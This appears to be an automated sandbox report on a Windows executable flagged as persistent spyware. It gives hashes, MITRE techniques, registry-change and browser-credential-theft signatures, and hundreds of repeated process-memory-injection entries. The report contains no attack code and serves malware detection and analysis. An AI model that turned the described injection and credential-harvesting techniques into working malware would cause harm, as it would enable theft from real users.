b2ebc0f8c302a04961b8c2ed0673384050e5932a370be062788b7630bf188123

Analysis

max time kernel
117s
max time network
143s
platform
windows7_x64
resource
win7
submitted
13/07/2020, 12:04

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Guqcvju_Signed_.exe
Size

1.1MB
MD5

271646d2ae5f0c7693be133688eaca38
SHA1

fce0e671122419cbb94f9651039323e945960964
SHA256

b2ebc0f8c302a04961b8c2ed0673384050e5932a370be062788b7630bf188123
SHA512

263656c10302a5ae39d3712b7bcbf8424b46bb98132bdb1f659baebba72eb1e166e5af4b63ad83e4b458fc4547ebcb1b7be62c18e4dd3622fdcf8067f40fe3b7

Score

8^/10

persistence spyware

Malware Config

Signatures

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
2408	reg.exe
2420	reg.exe
2520	reg.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Script User-Agent 1 IoCs

description	flow	ioc
HTTP User-Agent header	5	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 527 IoCs

description	pid	Process	procid_target
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
PID 1496 wrote to memory of 748	1496	Guqcvju_Signed_.exe	24
